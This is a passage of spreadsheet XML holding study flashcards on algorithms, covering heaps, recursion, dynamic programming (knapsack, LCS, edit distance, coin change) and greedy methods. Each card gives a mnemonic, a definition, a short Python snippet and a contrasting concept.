        <is>
          <t>import heapq / top = heapq.nlargest(k, stream) # O(n log k) / # or hand-roll a min-heap of size k</t>
        </is>
      </c>
      <c r="G240" t="inlineStr">
        <is>
          <t>Quickselect - finds the k-th in O(n) but needs all data in memory at once; the size-k heap works online over endless streams.</t>
        </is>
      </c>
      <c r="H240" t="inlineStr">
        <is>
          <t>A VIP room with k seats and a ruthless bouncer.</t>
        </is>
      </c>
      <c r="J240" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K240" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" t="n">
        <v>0</v>
      </c>
      <c r="B241" t="inlineStr">
        <is>
          <t>239</t>
        </is>
      </c>
      <c r="C241" t="inlineStr">
        <is>
          <t>Replacement selection</t>
        </is>
      </c>
      <c r="D241" t="inlineStr">
        <is>
          <t>Knuth's snowplow circling a loop road at dawn while snow keeps falling: it clears fresh snow that lands AHEAD of it in the same lap, so each lap clears two plow-loads.</t>
        </is>
      </c>
      <c r="E241" t="inlineStr">
        <is>
          <t>External-sort run generation: a heap emits ascending values, admitting arrivals to the run unless below the last output; average run ~2x memory.</t>
        </is>
      </c>
      <c r="F241" t="inlineStr">
        <is>
          <t>heap emits 3, 7, 9...; arriving 8 joins the current run / arriving 2 &lt; last output 9 -&gt; frozen for the next run</t>
        </is>
      </c>
      <c r="G241" t="inlineStr">
        <is>
          <t>Simple chunk sorting - produces runs exactly one memory in size; the snowplow doubles expected run length, halving later merge passes.</t>
        </is>
      </c>
      <c r="H241" t="inlineStr">
        <is>
          <t>A bus that keeps boarding passengers whose stops are still ahead.</t>
        </is>
      </c>
      <c r="J241" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K241" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" t="n">
        <v>0</v>
      </c>
      <c r="B242" t="inlineStr">
        <is>
          <t>240</t>
        </is>
      </c>
      <c r="C242" t="inlineStr">
        <is>
          <t>Recursion</t>
        </is>
      </c>
      <c r="D242" t="inlineStr">
        <is>
          <t>Russian nesting dolls: to open the giant doll you must first open the doll inside, and the one inside that, down to the tiny solid doll - then reassemble outward.</t>
        </is>
      </c>
      <c r="E242" t="inlineStr">
        <is>
          <t>A function that calls itself on smaller inputs, reducing a big problem to base cases plus self-similar subproblems; each call gets its own stack frame.</t>
        </is>
      </c>
      <c r="F242" t="inlineStr">
        <is>
          <t>def fact(n): / return 1 if n == 0 else n * fact(n - 1)</t>
        </is>
      </c>
      <c r="G242" t="inlineStr">
        <is>
          <t>Iteration - loops reuse one frame with mutable state; recursion stores state in the call stack. Any recursion can become a loop plus explicit stack.</t>
        </is>
      </c>
      <c r="H242" t="inlineStr">
        <is>
          <t>Two mirrors facing each other, images all the way down.</t>
        </is>
      </c>
      <c r="J242" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K242" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" t="n">
        <v>0</v>
      </c>
      <c r="B243" t="inlineStr">
        <is>
          <t>241</t>
        </is>
      </c>
      <c r="C243" t="inlineStr">
        <is>
          <t>Base case</t>
        </is>
      </c>
      <c r="D243" t="inlineStr">
        <is>
          <t>The innermost nesting doll is solid wood - nothing inside, nothing left to open. Forget to carve her and you unscrew dolls for eternity.</t>
        </is>
      </c>
      <c r="E243" t="inlineStr">
        <is>
          <t>The non-recursive branch answering the smallest inputs directly; without a reachable base case, recursion never terminates.</t>
        </is>
      </c>
      <c r="F243" t="inlineStr">
        <is>
          <t>def fib(n): / if n &lt; 2: return n # base case / return fib(n-1) + fib(n-2)</t>
        </is>
      </c>
      <c r="G243" t="inlineStr">
        <is>
          <t>Missing vs wrong base case - missing gives infinite recursion and a crash; a WRONG base case quietly corrupts every answer built upon it.</t>
        </is>
      </c>
      <c r="H243" t="inlineStr">
        <is>
          <t>The ladder's bottom rung: step off it and stop climbing down.</t>
        </is>
      </c>
      <c r="J243" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K243" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" t="n">
        <v>0</v>
      </c>
      <c r="B244" t="inlineStr">
        <is>
          <t>242</t>
        </is>
      </c>
      <c r="C244" t="inlineStr">
        <is>
          <t>Stack depth and overflow</t>
        </is>
      </c>
      <c r="D244" t="inlineStr">
        <is>
          <t>A waiter stacking one plate per unfinished order: linear recursion over a million items piles plates to the ceiling until the tower crashes down - RecursionError.</t>
        </is>
      </c>
      <c r="E244" t="inlineStr">
        <is>
          <t>Every active call holds a stack frame; recursing deeper than the limit crashes (Python default ~1000) - DEPTH matters, not total call count.</t>
        </is>
      </c>
      <c r="F244" t="inlineStr">
        <is>
          <t>sys.setrecursionlimit(10000) / fact(100000) # RecursionError without it / # balanced-tree recursion: depth ~log n, safe</t>
        </is>
      </c>
      <c r="G244" t="inlineStr">
        <is>
          <t>Time complexity - a fast O(n) recursion can still die at depth n; mergesort makes O(n) calls but only O(log n) of them are alive at once.</t>
        </is>
      </c>
      <c r="H244" t="inlineStr">
        <is>
          <t>A Jenga tower of sticky notes reading 'finish me later'.</t>
        </is>
      </c>
      <c r="J244" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K244" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" t="n">
        <v>0</v>
      </c>
      <c r="B245" t="inlineStr">
        <is>
          <t>243</t>
        </is>
      </c>
      <c r="C245" t="inlineStr">
        <is>
          <t>Divide and conquer</t>
        </is>
      </c>
      <c r="D245" t="inlineStr">
        <is>
          <t>A general splits the enemy army in two, lets lieutenants win each half-battle however they like, then does his real work stitching the two victories into one triumph.</t>
        </is>
      </c>
      <c r="E245" t="inlineStr">
        <is>
          <t>Split the input into independent parts, solve each recursively, then combine the partial answers; the pattern behind mergesort, quicksort, Karatsuba.</t>
        </is>
      </c>
      <c r="F245" t="inlineStr">
        <is>
          <t>def solve(p): / if small(p): return direct(p) / return combine(solve(left(p)), solve(right(p)))</t>
        </is>
      </c>
      <c r="G245" t="inlineStr">
        <is>
          <t>Dynamic programming - D&amp;C subproblems are independent, nothing to reuse; DP subproblems overlap, which is why caching pays there.</t>
        </is>
      </c>
      <c r="H245" t="inlineStr">
        <is>
          <t>Cutting a log: halve, halve again, then stack the boards.</t>
        </is>
      </c>
      <c r="J245" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K245" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" t="n">
        <v>0</v>
      </c>
      <c r="B246" t="inlineStr">
        <is>
          <t>244</t>
        </is>
      </c>
      <c r="C246" t="inlineStr">
        <is>
          <t>Recurrence relation</t>
        </is>
      </c>
      <c r="D246" t="inlineStr">
        <is>
          <t>A genie's invoice that keeps citing itself: 'Total = 2 x (invoice for half the wish) + n gold handling fee.' You expand invoices until they cost pennies, then sum the pile.</t>
        </is>
      </c>
      <c r="E246" t="inlineStr">
        <is>
          <t>The cost equation of recursive code: T(n) expressed via T(smaller), e.g. T(n) = 2T(n/2) + O(n); solving it yields the complexity.</t>
        </is>
      </c>
      <c r="F246" t="inlineStr">
        <is>
          <t>T(n) = 2T(n/2) + n -&gt; n log n (mergesort) / T(n) = T(n-1) + 1 -&gt; n / T(n) = T(n/2) + 1 -&gt; log n</t>
        </is>
      </c>
      <c r="G246" t="inlineStr">
        <is>
          <t>Master theorem - one SHORTCUT for solving divide-style recurrences; the recurrence itself is just the cost equation you extract from code.</t>
        </is>
      </c>
      <c r="H246" t="inlineStr">
        <is>
          <t>A chain letter demanding two half-length copies plus postage.</t>
        </is>
      </c>
      <c r="J246" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K246" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" t="n">
        <v>0</v>
      </c>
      <c r="B247" t="inlineStr">
        <is>
          <t>245</t>
        </is>
      </c>
      <c r="C247" t="inlineStr">
        <is>
          <t>Master theorem</t>
        </is>
      </c>
      <c r="D247" t="inlineStr">
        <is>
          <t>Tug-of-war between a breeding tree of tiny chores (the leaves) and the root's single giant cleanup bill: whichever side grows faster sets the price; a tie stacks log identical floors.</t>
        </is>
      </c>
      <c r="E247" t="inlineStr">
        <is>
          <t>For T(n) = aT(n/b) + n^c: compare leaf growth log_b(a) with combine cost c - the bigger exponent wins; a tie adds one log factor.</t>
        </is>
      </c>
      <c r="F247" t="inlineStr">
        <is>
          <t>T=2T(n/2)+n: log2(2)=1=c -&gt; n log n / T=4T(n/2)+n: log2(4)=2&gt;1 -&gt; n^2 / T=2T(n/2)+n^2: c=2 wins -&gt; n^2</t>
        </is>
      </c>
      <c r="G247" t="inlineStr">
        <is>
          <t>Non-dividing recurrences - T(n)=T(n-1)+n or unequal splits need recursion trees or Akra-Bazzi; the master theorem only fits aT(n/b)+f(n).</t>
        </is>
      </c>
      <c r="H247" t="inlineStr">
        <is>
          <t>A three-door game show: leaves win, tie-log, root wins.</t>
        </is>
      </c>
      <c r="J247" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K247" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" t="n">
        <v>0</v>
      </c>
      <c r="B248" t="inlineStr">
        <is>
          <t>246</t>
        </is>
      </c>
      <c r="C248" t="inlineStr">
        <is>
          <t>Tail recursion</t>
        </is>
      </c>
      <c r="D248" t="inlineStr">
        <is>
          <t>A relay runner who hands off the baton and instantly walks off the track - nobody waits at the finish. Python runners all insist on standing around afterward, clogging the lanes.</t>
        </is>
      </c>
      <c r="E248" t="inlineStr">
        <is>
          <t>A recursive call in return position with nothing left to do afterward; languages with tail-call optimization reuse the frame - CPython does not.</t>
        </is>
      </c>
      <c r="F248" t="inlineStr">
        <is>
          <t>def loop(i, acc): / if i == 0: return acc / return loop(i - 1, acc * i) # tail call</t>
        </is>
      </c>
      <c r="G248" t="inlineStr">
        <is>
          <t>Plain recursion - n * fact(n-1) is NOT tail recursive: the multiply runs after the call returns, so the caller's frame must survive.</t>
        </is>
      </c>
      <c r="H248" t="inlineStr">
        <is>
          <t>Hot-potato toss where each tosser immediately sits down.</t>
        </is>
      </c>
      <c r="J248" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K248" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" t="n">
        <v>0</v>
      </c>
      <c r="B249" t="inlineStr">
        <is>
          <t>247</t>
        </is>
      </c>
      <c r="C249" t="inlineStr">
        <is>
          <t>Recursion to iteration</t>
        </is>
      </c>
      <c r="D249" t="inlineStr">
        <is>
          <t>Fire the waiter with the teetering plate tower and grab a clipboard: pending orders go on a stack of cards YOU control - heap-sized, with no ceiling to crash into.</t>
        </is>
      </c>
      <c r="E249" t="inlineStr">
        <is>
          <t>Any recursion rewrites as a loop with an explicit stack holding what each frame stored; tail recursion converts to a bare loop with variables.</t>
        </is>
      </c>
      <c r="F249" t="inlineStr">
        <is>
          <t>stack = [root] / while stack: / node = stack.pop(); visit(node); stack += node.children</t>
        </is>
      </c>
      <c r="G249" t="inlineStr">
        <is>
          <t>Memoization - conversion changes WHERE state lives (heap vs call stack), not how many subproblems get solved.</t>
        </is>
      </c>
      <c r="H249" t="inlineStr">
        <is>
          <t>Unrolling nesting dolls onto a conveyor belt one by one.</t>
        </is>
      </c>
      <c r="J249" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K249" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" t="n">
        <v>0</v>
      </c>
      <c r="B250" t="inlineStr">
        <is>
          <t>248</t>
        </is>
      </c>
      <c r="C250" t="inlineStr">
        <is>
          <t>Mutual recursion</t>
        </is>
      </c>
      <c r="D250" t="inlineStr">
        <is>
          <t>Two dance partners: is_even asks is_odd, who spins the question straight back to is_even, each pass shrinking n by one - until n hits zero and the music stops.</t>
        </is>
      </c>
      <c r="E250" t="inlineStr">
        <is>
          <t>Two or more functions calling each other in a cycle (A calls B calls A); their combined base cases must break the loop.</t>
        </is>
      </c>
      <c r="F250" t="inlineStr">
        <is>
          <t>def is_even(n): return True if n == 0 else is_odd(n - 1) / def is_odd(n): return False if n == 0 else is_even(n - 1)</t>
        </is>
      </c>
      <c r="G250" t="inlineStr">
        <is>
          <t>Simple recursion - one function cycling to itself; mutual recursion rules parsers, where parse_expr and parse_term phone each other.</t>
        </is>
      </c>
      <c r="H250" t="inlineStr">
        <is>
          <t>Recursive-descent grammar rules calling each other in a ring.</t>
        </is>
      </c>
      <c r="J250" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K250" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" t="n">
        <v>0</v>
      </c>
      <c r="B251" t="inlineStr">
        <is>
          <t>249</t>
        </is>
      </c>
      <c r="C251" t="inlineStr">
        <is>
          <t>Tree recursion</t>
        </is>
      </c>
      <c r="D251" t="inlineStr">
        <is>
          <t>One gossip tells two friends, each tells two more; by evening the same rumor has re-reached everyone through thousands of separate whisper-paths.</t>
        </is>
      </c>
      <c r="E251" t="inlineStr">
        <is>
          <t>Each call spawns multiple recursive calls, making a call TREE that can explode exponentially - naive fib(n) makes ~1.6^n calls yet is only n deep.</t>
        </is>
      </c>
      <c r="F251" t="inlineStr">
        <is>
          <t>def fib(n): / if n &lt; 2: return n / return fib(n-1) + fib(n-2) # ~1.6^n calls, depth only n</t>
        </is>
      </c>
      <c r="G251" t="inlineStr">
        <is>
          <t>Linear recursion - one self-call per frame, so depth equals cost; tree recursion's cost is the node COUNT, and repeated nodes are DP's cue.</t>
        </is>
      </c>
      <c r="H251" t="inlineStr">
        <is>
          <t>A family tree of ancestors doubling every generation back.</t>
        </is>
      </c>
      <c r="J251" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K251" t="inlineStr">
        <is>
          <t>Recursion &amp; divide-and-conquer</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" t="n">
        <v>0</v>
      </c>
      <c r="B252" t="inlineStr">
        <is>
          <t>250</t>
        </is>
      </c>
      <c r="C252" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
      <c r="D252" t="inlineStr">
        <is>
          <t>A hiker who chalks the answer on every trail junction she solves; the second time any path reaches that junction, she reads the chalk instead of re-hiking the whole valley.</t>
        </is>
      </c>
      <c r="E252" t="inlineStr">
        <is>
          <t>Solve by combining answers to overlapping subproblems, computing each distinct subproblem once and reusing it - recursion plus a memory.</t>
        </is>
      </c>
      <c r="F252" t="inlineStr">
        <is>
          <t>fib with a cache: O(n) instead of O(1.6^n) / same recurrence, answers reused</t>
        </is>
      </c>
      <c r="G252" t="inlineStr">
        <is>
          <t>Divide and conquer - D&amp;C subproblems are disjoint so nothing repeats; DP's overlap is precisely why caching wins.</t>
        </is>
      </c>
      <c r="H252" t="inlineStr">
        <is>
          <t>Those who cannot remember the past are condemned to recompute it.</t>
        </is>
      </c>
      <c r="J252" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K252" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" t="n">
        <v>0</v>
      </c>
      <c r="B253" t="inlineStr">
        <is>
          <t>251</t>
        </is>
      </c>
      <c r="C253" t="inlineStr">
        <is>
          <t>Overlapping subproblems</t>
        </is>
      </c>
      <c r="D253" t="inlineStr">
        <is>
          <t>A detective's corkboard where the SAME suspect photo hangs from fifty different red strings: interview him once, pin the transcript, and every string reads it.</t>
        </is>
      </c>
      <c r="E253" t="inlineStr">
        <is>
          <t>The same subproblem recurs across the recursion tree; caching collapses an exponential tree onto its small set of distinct subproblems.</t>
        </is>
      </c>
      <c r="F253" t="inlineStr">
        <is>
          <t>fib(5)'s tree computes fib(2) three times / distinct subproblems: only n of them</t>
        </is>
      </c>
      <c r="G253" t="inlineStr">
        <is>
          <t>Optimal substructure - the other DP ingredient: substructure makes the recurrence CORRECT; overlap makes caching WORTH it.</t>
        </is>
      </c>
      <c r="H253" t="inlineStr">
        <is>
          <t>A deja-vu hallway with the same door behind every corner.</t>
        </is>
      </c>
      <c r="J253" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K253" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" t="n">
        <v>0</v>
      </c>
      <c r="B254" t="inlineStr">
        <is>
          <t>252</t>
        </is>
      </c>
      <c r="C254" t="inlineStr">
        <is>
          <t>Optimal substructure</t>
        </is>
      </c>
      <c r="D254" t="inlineStr">
        <is>
          <t>A champion Lego castle: pop off any tower and that tower is itself a champion tower - no winning castle ever contains a losing part.</t>
        </is>
      </c>
      <c r="E254" t="inlineStr">
        <is>
          <t>An optimal solution is built from optimal solutions to its subproblems - prefixes of shortest paths are shortest paths; this licenses the DP recurrence.</t>
        </is>
      </c>
      <c r="F254" t="inlineStr">
        <is>
          <t>short(s-&gt;t via v) = short(s-&gt;v) + short(v-&gt;t) / LCS of prefixes composes into LCS of strings</t>
        </is>
      </c>
      <c r="G254" t="inlineStr">
        <is>
          <t>Longest simple path - famously LACKS it: gluing longest subpaths can revisit vertices, so no clean recurrence exists.</t>
        </is>
      </c>
      <c r="H254" t="inlineStr">
        <is>
          <t>Russian-doll trophies: every inner doll also won gold.</t>
        </is>
      </c>
      <c r="J254" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K254" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" t="n">
        <v>0</v>
      </c>
      <c r="B255" t="inlineStr">
        <is>
          <t>253</t>
        </is>
      </c>
      <c r="C255" t="inlineStr">
        <is>
          <t>Memoization (top-down)</t>
        </is>
      </c>
      <c r="D255" t="inlineStr">
        <is>
          <t>A student taping a MEMO to the fridge after every hard calculation: at the next midnight craving she reads the memo and skips the math. The fridge fills lazily, only with questions actually asked.</t>
        </is>
      </c>
      <c r="E255" t="inlineStr">
        <is>
          <t>Wrap the natural recursion with a cache keyed by arguments: repeat calls return the stored answer; only reachable subproblems ever get computed.</t>
        </is>
      </c>
      <c r="F255" t="inlineStr">
        <is>
          <t>from functools import lru_cache / @lru_cache(None) / def fib(n): return n if n &lt; 2 else fib(n-1) + fib(n-2)</t>
        </is>
      </c>
      <c r="G255" t="inlineStr">
        <is>
          <t>Tabulation - memoization recurses from the top and may skip states but pays stack depth; tabulation loops bottom-up over all states.</t>
        </is>
      </c>
      <c r="H255" t="inlineStr">
        <is>
          <t>It's memo-ization, not memorization - the R stays at the door.</t>
        </is>
      </c>
      <c r="J255" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K255" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" t="n">
        <v>0</v>
      </c>
      <c r="B256" t="inlineStr">
        <is>
          <t>254</t>
        </is>
      </c>
      <c r="C256" t="inlineStr">
        <is>
          <t>Tabulation (bottom-up)</t>
        </is>
      </c>
      <c r="D256" t="inlineStr">
        <is>
          <t>A bricklayer filling the wall row by row from the foundation: every brick rests only on bricks already mortared - no scaffolding (call stack) ever needed.</t>
        </is>
      </c>
      <c r="E256" t="inlineStr">
        <is>
          <t>Fill a table from base cases upward with plain loops, each entry computed from already-filled ones; no recursion stack, you choose the order.</t>
        </is>
      </c>
      <c r="F256" t="inlineStr">
        <is>
          <t>dp = [0, 1] / for i in range(2, n + 1): / dp.append(dp[i-1] + dp[i-2])</t>
        </is>
      </c>
      <c r="G256" t="inlineStr">
        <is>
          <t>Memoization - same recurrence; tabulation computes ALL states iteratively and unlocks rolling-array space tricks, memoization computes only needed states.</t>
        </is>
      </c>
      <c r="H256" t="inlineStr">
        <is>
          <t>Sudoku filled strictly from solved corners outward.</t>
        </is>
      </c>
      <c r="J256" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K256" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" t="n">
        <v>0</v>
      </c>
      <c r="B257" t="inlineStr">
        <is>
          <t>255</t>
        </is>
      </c>
      <c r="C257" t="inlineStr">
        <is>
          <t>0/1 knapsack</t>
        </is>
      </c>
      <c r="D257" t="inlineStr">
        <is>
          <t>A burglar at a museum with one zip-shut backpack: each artifact goes in WHOLE or stays - no sawing the golden goose in half. At every case he mutters 'skip it or schlep it'.</t>
        </is>
      </c>
      <c r="E257" t="inlineStr">
        <is>
          <t>Choose items with weights and values to maximize value under a capacity, each item taken whole or not at all; dp[i][w] = best of skip or take.</t>
        </is>
      </c>
      <c r="F257" t="inlineStr">
        <is>
          <t>for i in items: / for w in range(W, wt[i] - 1, -1): / dp[w] = max(dp[w], dp[w - wt[i]] + val[i])</t>
        </is>
      </c>
      <c r="G257" t="inlineStr">
        <is>
          <t>Fractional knapsack - items may be split, so greedy by density solves it; 0/1's all-or-nothing choice forces DP.</t>
        </is>
      </c>
      <c r="H257" t="inlineStr">
        <is>
          <t>Airline 23kg suitcase Tetris the night before a flight.</t>
        </is>
      </c>
      <c r="J257" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K257" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" t="n">
        <v>0</v>
      </c>
      <c r="B258" t="inlineStr">
        <is>
          <t>256</t>
        </is>
      </c>
      <c r="C258" t="inlineStr">
        <is>
          <t>Longest common subsequence</t>
        </is>
      </c>
      <c r="D258" t="inlineStr">
        <is>
          <t>Two concert setlists from different nights: highlight the longest run of songs both crowds heard in the same order, freely skipping over each night's extra tracks.</t>
        </is>
      </c>
      <c r="E258" t="inlineStr">
        <is>
          <t>Longest sequence appearing in both strings in order but not necessarily contiguously; DP on prefix pairs - match extends, else take the better drop.</t>
        </is>
      </c>
      <c r="F258" t="inlineStr">
        <is>
          <t>if a[i] == b[j]: dp[i][j] = dp[i-1][j-1] + 1 / else: dp[i][j] = max(dp[i-1][j], dp[i][j-1])</t>
        </is>
      </c>
      <c r="G258" t="inlineStr">
        <is>
          <t>Longest common substring - must be contiguous; a subsequence may skip characters ('ABCBDAB' vs 'BDCABA' gives LCS 'BCBA').</t>
        </is>
      </c>
      <c r="H258" t="inlineStr">
        <is>
          <t>diff tools: unchanged lines are the LCS skeleton.</t>
        </is>
      </c>
      <c r="J258" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K258" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" t="n">
        <v>0</v>
      </c>
      <c r="B259" t="inlineStr">
        <is>
          <t>257</t>
        </is>
      </c>
      <c r="C259" t="inlineStr">
        <is>
          <t>Edit distance</t>
        </is>
      </c>
      <c r="D259" t="inlineStr">
        <is>
          <t>A proofreading gremlin with three rubber stamps - INSERT, DELETE, SWAP - charging one coin per stamp to morph kitten into sitting; he brags the three-coin bill is provably minimal.</t>
        </is>
      </c>
      <c r="E259" t="inlineStr">
        <is>
          <t>Minimum inserts, deletes, and substitutions turning one string into another; dp[i][j] built from three neighbors - Levenshtein distance.</t>
        </is>
      </c>
      <c r="F259" t="inlineStr">
        <is>
          <t>cost = 0 if a[i-1] == b[j-1] else 1 / dp[i][j] = min(dp[i-1][j] + 1, dp[i][j-1] + 1, dp[i-1][j-1] + cost)</t>
        </is>
      </c>
      <c r="G259" t="inlineStr">
        <is>
          <t>LCS - sibling recurrence without substitution; for insert/delete only, distance = len(a) + len(b) - 2*LCS.</t>
        </is>
      </c>
      <c r="H259" t="inlineStr">
        <is>
          <t>Autocorrect's did-you-mean ranked by fewest keystrokes.</t>
        </is>
      </c>
      <c r="J259" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K259" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" t="n">
        <v>0</v>
      </c>
      <c r="B260" t="inlineStr">
        <is>
          <t>258</t>
        </is>
      </c>
      <c r="C260" t="inlineStr">
        <is>
          <t>Coin change DP</t>
        </is>
      </c>
      <c r="D260" t="inlineStr">
        <is>
          <t>A vending machine in the land of 1, 3, and 4 cent coins: for 6 cents the greedy clerk slams down 4+1+1 while the dusty DP abacus in the corner clicks 3+3 and wins.</t>
        </is>
      </c>
      <c r="E260" t="inlineStr">
        <is>
          <t>Fewest coins (or number of ways) to reach an amount with unlimited coins per denomination; DP over amounts - greedy fails on non-canonical sets.</t>
        </is>
      </c>
      <c r="F260" t="inlineStr">
        <is>
          <t>dp = [0] + [inf] * n / for a in range(1, n + 1): / dp[a] = 1 + min(dp[a - c] for c in coins if c &lt;= a)</t>
        </is>
      </c>
      <c r="G260" t="inlineStr">
        <is>
          <t>Min coins vs counting ways - same table, different combine: min+1 for fewest, sum for ways; loop order decides combinations vs permutations.</t>
        </is>
      </c>
      <c r="H260" t="inlineStr">
        <is>
          <t>A cashier drawer where greedy shortchanges itself.</t>
        </is>
      </c>
      <c r="J260" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K260" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" t="n">
        <v>0</v>
      </c>
      <c r="B261" t="inlineStr">
        <is>
          <t>259</t>
        </is>
      </c>
      <c r="C261" t="inlineStr">
        <is>
          <t>DP space optimization</t>
        </is>
      </c>
      <c r="D261" t="inlineStr">
        <is>
          <t>A monk with two slates: he writes tomorrow's row from today's, wipes today's clean, and swaps them - the full scroll never exists at once.</t>
        </is>
      </c>
      <c r="E261" t="inlineStr">
        <is>
          <t>When row i depends only on row i-1, keep two rows - or one with a careful sweep direction; knapsack's O(nW) table shrinks to O(W) space.</t>
        </is>
      </c>
      <c r="F261" t="inlineStr">
        <is>
          <t>prev, cur = cur, prev # rolling rows / # 1-row knapsack: sweep w from W DOWN to wt[i] / # downward sweep stops an item being taken twice</t>
        </is>
      </c>
      <c r="G261" t="inlineStr">
        <is>
          <t>Full-table DP - required if you must RECONSTRUCT the chosen path; rolling arrays keep values but forget the trail unless choices are stored separately.</t>
        </is>
      </c>
      <c r="H261" t="inlineStr">
        <is>
          <t>Etch-a-Sketch: shake away every row but the newest.</t>
        </is>
      </c>
      <c r="J261" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K261" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" t="n">
        <v>0</v>
      </c>
      <c r="B262" t="inlineStr">
        <is>
          <t>260</t>
        </is>
      </c>
      <c r="C262" t="inlineStr">
        <is>
          <t>Greedy algorithm</t>
        </is>
      </c>
      <c r="D262" t="inlineStr">
        <is>
          <t>A goat eating through a garden: always chomps the juiciest nearby leaf, never steps back, never plans - and in the RIGHT gardens still ends up at the prize marrow.</t>
        </is>
      </c>
      <c r="E262" t="inlineStr">
        <is>
          <t>Build a solution by repeatedly taking the locally best choice and never undoing it; fast and simple, but correct only for problems with special structure.</t>
        </is>
      </c>
      <c r="F262" t="inlineStr">
        <is>
          <t>meetings.sort(key=lambda m: m.end) / take each meeting not overlapping the last taken</t>
        </is>
      </c>
      <c r="G262" t="inlineStr">
        <is>
          <t>DP - weighs all sub-choices before committing; greedy commits instantly and never revisits, so it needs a proof, not vibes.</t>
        </is>
      </c>
      <c r="H262" t="inlineStr">
        <is>
          <t>A kid grabbing the biggest visible cookie every round.</t>
        </is>
      </c>
      <c r="J262" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K262" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" t="n">
        <v>0</v>
      </c>
      <c r="B263" t="inlineStr">
        <is>
          <t>261</t>
        </is>
      </c>
      <c r="C263" t="inlineStr">
        <is>
          <t>Greedy-choice property</t>
        </is>
      </c>
      <c r="D263" t="inlineStr">
        <is>
          <t>A chess oracle whispering: whatever the grandmasters' perfect game is, one of them opens with THIS move - so you can play it blind and stay on a winning line.</t>
        </is>
      </c>
      <c r="E263" t="inlineStr">
        <is>
          <t>Some optimal solution always contains the greedy first move, so committing to it is safe; add optimal substructure and greedy becomes provably correct.</t>
        </is>
      </c>
